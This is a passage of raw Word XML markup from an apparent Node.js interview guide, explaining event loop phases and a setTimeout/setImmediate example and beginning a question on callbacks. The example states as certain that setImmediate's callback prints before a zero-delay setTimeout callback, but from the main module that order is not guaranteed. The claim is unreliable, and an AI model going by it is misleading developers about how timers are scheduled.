      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="640"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>The event loop operates in phases, each responsible for handling specific types of tasks. These phases are repeated in a loop, allowing Node.js to process asynchronous tasks efficiently.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="144E0549" w14:textId="77777777" w:rsidR="00C61D82" w:rsidRPr="00DA2F32" w:rsidRDefault="00C61D82" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Phases of the Node.js Event Loop</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="102D8269" w14:textId="77777777" w:rsidR="00C61D82" w:rsidRPr="00DA2F32" w:rsidRDefault="00C61D82" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="641"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Timers Phase:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CF0B529" w14:textId="77777777" w:rsidR="00C61D82" w:rsidRPr="00DA2F32" w:rsidRDefault="00C61D82" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="641"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Handles callbacks from setTimeout() and setInterval(). If a timer’s delay has expired, its callback is executed in this phase.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7962B684" w14:textId="77777777" w:rsidR="00C61D82" w:rsidRPr="00DA2F32" w:rsidRDefault="00C61D82" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="641"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Pending Callbacks Phase:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B00D0E0" w14:textId="77777777" w:rsidR="00C61D82" w:rsidRPr="00DA2F32" w:rsidRDefault="00C61D82" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="641"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Executes I/O callbacks that were deferred to the next iteration of the event loop. These are usually callbacks from operations like TCP errors.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="495A0302" w14:textId="77777777" w:rsidR="00C61D82" w:rsidRPr="00DA2F32" w:rsidRDefault="00C61D82" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="641"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Idle, Prepare Phase:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D323134" w14:textId="77777777" w:rsidR="00C61D82" w:rsidRPr="00DA2F32" w:rsidRDefault="00C61D82" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="641"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>This phase is used internally by Node.js and not directly exposed to developers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29966AB0" w14:textId="77777777" w:rsidR="00C61D82" w:rsidRPr="00DA2F32" w:rsidRDefault="00C61D82" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="641"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Poll Phase:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A87B0C4" w14:textId="77777777" w:rsidR="00C61D82" w:rsidRPr="00DA2F32" w:rsidRDefault="00C61D82" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="641"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>The poll phase is the heart of the event loop, responsible for retrieving new I/O events and executing I/O-related callbacks. If there are no timers or immediate callbacks, the event loop may block here waiting for I/O.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="129505FB" w14:textId="77777777" w:rsidR="00C61D82" w:rsidRPr="00DA2F32" w:rsidRDefault="00C61D82" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="641"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Check Phase:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A131930" w14:textId="77777777" w:rsidR="00C61D82" w:rsidRPr="00DA2F32" w:rsidRDefault="00C61D82" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="641"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Executes callbacks from setImmediate(). These callbacks are executed immediately after the poll phase, even if I/O operations are pending.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49BA50AE" w14:textId="77777777" w:rsidR="00C61D82" w:rsidRPr="00DA2F32" w:rsidRDefault="00C61D82" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="641"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Close Callbacks Phase:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BB60200" w14:textId="77777777" w:rsidR="00C61D82" w:rsidRPr="00DA2F32" w:rsidRDefault="00C61D82" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="641"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Executes callbacks related to closing events, such as socket.on('close', ...).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="607764DB" w14:textId="77777777" w:rsidR="00C61D82" w:rsidRPr="00DA2F32" w:rsidRDefault="00C61D82" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>How the Event Loop Works</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F6521DD" w14:textId="77777777" w:rsidR="00C61D82" w:rsidRPr="00DA2F32" w:rsidRDefault="00C61D82" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="642"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>When Node.js starts, it initializes the event loop and begins processing the code in the main thread.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45D1023D" w14:textId="77777777" w:rsidR="00C61D82" w:rsidRPr="00DA2F32" w:rsidRDefault="00C61D82" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="642"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Asynchronous operations (e.g., reading a file) are offloaded to the system kernel, which handles them separately. Node.js continues executing other code while the kernel performs the I/O operation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E4FA7A9" w14:textId="77777777" w:rsidR="00C61D82" w:rsidRPr="00DA2F32" w:rsidRDefault="00C61D82" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="642"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Once the asynchronous operation completes, the kernel signals Node.js, which adds the corresponding callback to the event loop's callback queue.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50E005DD" w14:textId="77777777" w:rsidR="00C61D82" w:rsidRPr="00DA2F32" w:rsidRDefault="00C61D82" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="642"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>The event loop then checks its phases. If it finds pending callbacks, it executes them in the appropriate phase.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D4DD8B6" w14:textId="77777777" w:rsidR="00C61D82" w:rsidRPr="00DA2F32" w:rsidRDefault="00C61D82" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="642"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>The loop continues running as long as there are callbacks to process, ensuring that all asynchronous tasks are handled without blocking the main thread.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E7F8765" w14:textId="77777777" w:rsidR="00C61D82" w:rsidRPr="00DA2F32" w:rsidRDefault="00C61D82" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Event Loop Example</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F733E73"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console.log('Start');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="532F6E0F"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D9E1CB3"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setTimeout(() =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15BFE469"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console.log('Timeout callback');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DAA3A67"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0);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="068F6C58"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73C273D"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setImmediate(() =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69BA1CA2"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console.log('Immediate callback');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23E96C03"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4CE17DEA"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1A85726"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console.log('End');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3223F7D1" w14:textId="77777777" w:rsidR="00C61D82" w:rsidRPr="00DA2F32" w:rsidRDefault="00C61D82" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Output:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="197B523F"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Start</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B0EEF0A"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End</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76F5164A"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Immediate callback</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="336515E9" w14:textId="77777777" w:rsidR="00C61D82" w:rsidRPr="00DA2F32" w:rsidRDefault="00C61D8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Timeout callback</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48065D64" w14:textId="77777777" w:rsidR="00C61D82" w:rsidRPr="00DA2F32" w:rsidRDefault="00C61D82" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Explanation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3739A5B0" w14:textId="77777777" w:rsidR="00C61D82" w:rsidRPr="00DA2F32" w:rsidRDefault="00C61D82" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="643"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>The synchronous console.log('Start') and console.log('End') are executed first.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39961B0B" w14:textId="77777777" w:rsidR="00C61D82" w:rsidRPr="00DA2F32" w:rsidRDefault="00C61D82" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="643"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>The setTimeout() callback is scheduled to run after the timers phase, while setImmediate() is scheduled to run in the check phase.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E98411F" w14:textId="77777777" w:rsidR="00C61D82" w:rsidRPr="00DA2F32" w:rsidRDefault="00C61D82" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="643"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Even though setTimeout() has a 0ms delay, setImmediate() runs first because of how the event loop phases are ordered.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42073115" w14:textId="77777777" w:rsidR="00C61D82" w:rsidRPr="00DA2F32" w:rsidRDefault="00C61D82" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Event Loop and Performance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28F2BEE8" w14:textId="77777777" w:rsidR="00C61D82" w:rsidRPr="00DA2F32" w:rsidRDefault="00C61D82" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>The event loop is crucial for achieving high performance in Node.js, especially for I/O-bound applications. By using the event loop effectively, Node.js can handle thousands of concurrent connections, making it suitable for building web servers, real-time applications, and APIs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A282BDD" w14:textId="77777777" w:rsidR="000002BD" w:rsidRPr="00DA2F32" w:rsidRDefault="000002BD" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D9B53E2"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4" w:name="_Toc178383187"/>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Q4. What is a callback in Node.js? Can you provide an example?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:p w14:paraId="149429E3" w14:textId="77777777" w:rsidR="00BC18A1" w:rsidRPr="00DA2F32" w:rsidRDefault="00BC18A1" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>In Node.js, callbacks are a fundamental concept, especially given its asynchronous nature. A callback is a function that is passed as an argument to another function and is executed after the completion of that function. This is particularly useful for handling asynchronous operations like reading files, making HTTP requests, or querying a database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13179693" w14:textId="77777777" w:rsidR="00BC18A1" w:rsidRPr="00DA2F32" w:rsidRDefault="00BC18A1" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Key Concepts of Callbacks in Node.js</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AF84638" w14:textId="77777777" w:rsidR="00BC18A1" w:rsidRPr="00DA2F32" w:rsidRDefault="00BC18A1" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="644"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
